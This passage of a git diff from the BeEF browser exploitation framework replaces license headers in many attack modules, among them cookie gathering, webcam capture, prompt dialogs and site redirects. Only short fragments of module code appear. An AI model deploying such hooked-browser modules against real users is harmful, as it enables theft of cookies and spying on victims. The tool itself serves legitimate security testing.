2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Mobilesafari_address_spoofing < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/prompt_dialog/command.js b/modules/browser/hooked_domain/prompt_dialog/command.js index ab02786fb..71c43e538 100644 --- a/modules/browser/hooked_domain/prompt_dialog/command.js +++ b/modules/browser/hooked_domain/prompt_dialog/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var answer = prompt("<%== @question %>","") diff --git a/modules/browser/hooked_domain/prompt_dialog/config.yaml b/modules/browser/hooked_domain/prompt_dialog/config.yaml index 0f9035279..def589af4 100644 --- a/modules/browser/hooked_domain/prompt_dialog/config.yaml +++ b/modules/browser/hooked_domain/prompt_dialog/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/prompt_dialog/module.rb b/modules/browser/hooked_domain/prompt_dialog/module.rb index 0718acbf9..393cb35f5 100644 --- a/modules/browser/hooked_domain/prompt_dialog/module.rb +++ b/modules/browser/hooked_domain/prompt_dialog/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Prompt_dialog < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/replace_video/command.js b/modules/browser/hooked_domain/replace_video/command.js index 28ca0622f..033fe3e12 100644 --- a/modules/browser/hooked_domain/replace_video/command.js +++ b/modules/browser/hooked_domain/replace_video/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { $j('<%= @jquery_selector %>').each(function(){ var width = $j(this).css('width'); diff --git a/modules/browser/hooked_domain/replace_video/config.yaml b/modules/browser/hooked_domain/replace_video/config.yaml index f8ddbcda0..8c88b92b4 100644 --- a/modules/browser/hooked_domain/replace_video/config.yaml +++ b/modules/browser/hooked_domain/replace_video/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/replace_video/module.rb b/modules/browser/hooked_domain/replace_video/module.rb index c99c020c4..e5c63c9f1 100644 --- a/modules/browser/hooked_domain/replace_video/module.rb +++ b/modules/browser/hooked_domain/replace_video/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Replace_video < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/rickroll/command.js b/modules/browser/hooked_domain/rickroll/command.js index 2ac24b3eb..331b3ba8a 100644 --- a/modules/browser/hooked_domain/rickroll/command.js +++ b/modules/browser/hooked_domain/rickroll/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { $j('body').html(''); diff --git a/modules/browser/hooked_domain/rickroll/config.yaml b/modules/browser/hooked_domain/rickroll/config.yaml index f86c183fa..9209a0685 100644 --- a/modules/browser/hooked_domain/rickroll/config.yaml +++ b/modules/browser/hooked_domain/rickroll/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/rickroll/module.rb b/modules/browser/hooked_domain/rickroll/module.rb index 920b9065c..66c8fa76a 100644 --- a/modules/browser/hooked_domain/rickroll/module.rb +++ b/modules/browser/hooked_domain/rickroll/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Rickroll < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/site_redirect/command.js b/modules/browser/hooked_domain/site_redirect/command.js index 2c48293fd..27dcd8594 100644 --- a/modules/browser/hooked_domain/site_redirect/command.js +++ b/modules/browser/hooked_domain/site_redirect/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { window.location = "<%= @redirect_url %>"; diff --git a/modules/browser/hooked_domain/site_redirect/config.yaml b/modules/browser/hooked_domain/site_redirect/config.yaml index 3c9681e0a..d1a020585 100644 --- a/modules/browser/hooked_domain/site_redirect/config.yaml +++ b/modules/browser/hooked_domain/site_redirect/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/site_redirect/module.rb b/modules/browser/hooked_domain/site_redirect/module.rb index 25dcee03e..aa178b8df 100644 --- a/modules/browser/hooked_domain/site_redirect/module.rb +++ b/modules/browser/hooked_domain/site_redirect/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Site_redirect < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/site_redirect_iframe/command.js b/modules/browser/hooked_domain/site_redirect_iframe/command.js index f707b25f7..153fa69a6 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/command.js +++ b/modules/browser/hooked_domain/site_redirect_iframe/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = 'Iframe successfully created!'; diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml index ad73b2efe..1e4d1ac8a 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml +++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/site_redirect_iframe/module.rb b/modules/browser/hooked_domain/site_redirect_iframe/module.rb index 8ca97afa1..6d25c3aad 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb +++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Site_redirect_iframe < BeEF::Core::Command diff --git a/modules/browser/play_sound/command.js b/modules/browser/play_sound/command.js index f0c4c7b58..f674c6730 100644 --- a/modules/browser/play_sound/command.js +++ b/modules/browser/play_sound/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { function playSound(url) { diff --git a/modules/browser/play_sound/config.yaml b/modules/browser/play_sound/config.yaml index 34d95eed7..46e15808a 100644 --- a/modules/browser/play_sound/config.yaml +++ b/modules/browser/play_sound/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/play_sound/module.rb b/modules/browser/play_sound/module.rb index ecb66ab2e..6de2fab29 100644 --- a/modules/browser/play_sound/module.rb +++ b/modules/browser/play_sound/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Play_sound < BeEF::Core::Command diff --git a/modules/browser/unhook/command.js b/modules/browser/unhook/command.js index 8ab5edce1..1301e0254 100644 --- a/modules/browser/unhook/command.js +++ b/modules/browser/unhook/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent unhook request"); diff --git a/modules/browser/unhook/config.yaml b/modules/browser/unhook/config.yaml index 70885f341..47a88e326 100644 --- a/modules/browser/unhook/config.yaml +++ b/modules/browser/unhook/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/unhook/module.rb b/modules/browser/unhook/module.rb index 63f5c8df1..f711022c7 100644 --- a/modules/browser/unhook/module.rb +++ b/modules/browser/unhook/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Unhook < BeEF::Core::Command diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js index 9ed0f73a5..48c2b77ff 100644 --- a/modules/browser/webcam/command.js +++ b/modules/browser/webcam/command.js @@ -1,20 +1,11 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { /* diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml index 69f3eb5fb..539e5751a 100644 --- a/modules/browser/webcam/config.yaml +++ b/modules/browser/webcam/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb index de2df6639..0130d5b34 100644 --- a/modules/browser/webcam/module.rb +++ b/modules/browser/webcam/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # require 'base64' class Webcam < BeEF::Core::Command diff --git a/modules/chrome_extensions/execute_tabs/command.js b/modules/chrome_extensions/execute_tabs/command.js index 1b9ceb907..10219874c 100644 --- a/modules/chrome_extensions/execute_tabs/command.js +++ b/modules/chrome_extensions/execute_tabs/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { try{ chrome.tabs.create({url:"<%= @url %>"}, function(tab){ diff --git a/modules/chrome_extensions/execute_tabs/config.yaml b/modules/chrome_extensions/execute_tabs/config.yaml index ae9c3031e..f3c05c603 100644 --- a/modules/chrome_extensions/execute_tabs/config.yaml +++ b/modules/chrome_extensions/execute_tabs/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/execute_tabs/module.rb b/modules/chrome_extensions/execute_tabs/module.rb index cf476cc61..8e1e31cd1 100644 --- a/modules/chrome_extensions/execute_tabs/module.rb +++ b/modules/chrome_extensions/execute_tabs/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Execute_tabs < BeEF::Core::Command diff --git a/modules/chrome_extensions/get_all_cookies/command.js b/modules/chrome_extensions/get_all_cookies/command.js index 4a531214b..d43ec533a 100755 --- a/modules/chrome_extensions/get_all_cookies/command.js +++ b/modules/chrome_extensions/get_all_cookies/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { the_url = "<%== @url %>"; if (the_url != 'default_all') { diff --git a/modules/chrome_extensions/get_all_cookies/config.yaml b/modules/chrome_extensions/get_all_cookies/config.yaml index 04cc73ebd..0b5d3cf7b 100755 --- a/modules/chrome_extensions/get_all_cookies/config.yaml +++ b/modules/chrome_extensions/get_all_cookies/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/get_all_cookies/module.rb b/modules/chrome_extensions/get_all_cookies/module.rb index 362e62d4f..37cac3263 100755 --- a/modules/chrome_extensions/get_all_cookies/module.rb +++ b/modules/chrome_extensions/get_all_cookies/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_all_cookies < BeEF::Core::Command diff --git a/modules/chrome_extensions/get_chrome_extensions/command.js b/modules/chrome_extensions/get_chrome_extensions/command.js index 49a38a176..d7f16b3ba 100644 --- a/modules/chrome_extensions/get_chrome_extensions/command.js +++ b/modules/chrome_extensions/get_chrome_extensions/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { extensions = new Array( diff --git a/modules/chrome_extensions/get_chrome_extensions/config.yaml b/modules/chrome_extensions/get_chrome_extensions/config.yaml index 69718be2e..550a48a4a 100644 --- a/modules/chrome_extensions/get_chrome_extensions/config.yaml +++ b/modules/chrome_extensions/get_chrome_extensions/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# 